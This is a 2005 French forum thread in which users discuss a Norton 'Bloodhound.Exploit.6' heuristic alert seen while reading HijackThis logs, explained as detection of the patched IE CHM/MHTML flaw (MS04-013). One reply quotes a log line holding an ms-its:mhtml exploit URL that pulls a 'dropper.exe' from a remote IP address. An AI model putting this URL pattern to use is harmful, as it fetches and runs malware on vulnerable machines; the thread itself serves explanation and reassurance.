High-Tech Santé Médecine Droit-Finances

Auto-Entrepreneur

Comment faire ?

Rechercher : dans
Par :

Bloodhound exploit 6

Dernière réponse le 28 avr 2005 à 15:26:57 Halala, le 28 avr 2005 à 11:01:46 
 Signaler ce message aux modérateurs

B'jour tout le monde. Ce matin, en allant sur www .hijackthis.de/index.php , j'ai vu passer bloodhound exploit 6...
Et ceci en analysant par curiosité ce log: http://www.commentcamarche.net/forum/affich-1477284-Purifier­-mon-PC-avec-Hijackthis

Source : C:\Temporary Internet Files\Content.IE5\OHMZC1YV\index[1].htm
Des courageux pour confirmer ? ?...;-)
Halala...çà l'fait pas...mais çà va l'faire...

Meilleures réponses pour « Bloodhound exploit 6 » dans :
6 applications professionnelles pour votre iPhone Voir6 applications professionnelles pour votre iPhone Pratique et au design séduisant, l’iPhone d’Apple est entré en été 2007 sur le marché avec un très grand succès. Avec déjà des fonctionnalités pré-intégrées performantes, Apple propose en plus sur...
Désinstaller proprement Spybot Search and Destroy 1.6 VoirPour désinstaller Spybot Search&Destroy 1.6, suivre la procédure suivante: Ajout/Suppression de programmes Se débarrasser complètement de Spybot-S&D 1.6 Petit correctif Ajout/Suppression de programmes En premier lieu, désactiver le...
[Webmaster] Afficher des PNG transparents dans IE 5.5 et IE 6 VoirLe problème Les PNG transparents permettent de faire de très beaux effets sur les pages web. Tous les navigateurs le supportent (Firefox, Opera, Konqueror, Safari, Camino...)... sauf Internet Explorer 5.5 et 6 ! (Internet Explorer 7, lui,...
Télécharger Nero 6 VoirNero 6 est une ancienne version de la suite de gravure Nero. Cette version contient les outils suivants : Nero StartSmart 2, Nero Express 6, Nero BackItUp, Nero SoundTrax, Nero Image Drive, Nero Burning ROM 6, Nero Cover Designer, ...
Télécharger Visual Basic 6 Runtime (VB6 DLL) VoirLe Runtime Visual Basic 6 contient l'ensemble des librairies (DLL) nécessaires pour exécuter des programmes écrits en langage Visual Basic 6.0. Il contient notamment les DLL suivantes :...
Télécharger Delphi 6 Edition personnelle VoirLa société Borland (Inprise) a mis à disposition gratuitement, pour un usage non-commercial, la version 6 de son environnement de développement intégré (EDI). Celui-ci possède un compilateur natif et de puissants outils permettant de développer...
Posez votre question Répondre

1

moe, le 28 avr 2005 à 12:58:15

Salut halala

Il m'est arrivé il ya quelques temps la meme chose.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:

O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.c­hm::/dropper.exe

Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloo­dhound.exploit.6.html

"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(et maintenant coolwebsearch) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
http://www.k-otik.com/bugtraq/bulletins/69

En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé, page web ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.

Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html

Donc logiquement (enfin j'espère..),si windows est à jours et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV (detection heuristique) qui fait son boulot.

a+

   
Répondre à moe

3

 Halala, le 28 avr 2005 à 15:26:57

Ah ouais...pas à dire....ici: http://www.kotik.com/bugtraq/bulletins/69, Norton sonne les cloches...

Halala...çà l'fait pas...mais çà va l'faire...

   
Répondre à Halala

2

Halala, le 28 avr 2005 à 14:36:56

OK moe...T'es un pro...;-)
Je me suis pas inquiété, vu les mises à jour et les protections que j'ai...pas de souci...
Mais sur ce site là, çà me paraissait tout de même étrange...
Norton est trop zélé...lolll
Donc, pas de souci, CE SITE EST SAIN ! !
Merci et @+... Halala...çà l'fait pas...mais çà va l'faire...

   
Répondre à Halala
Posez votre question Répondre
Ils ont besoin de votre aide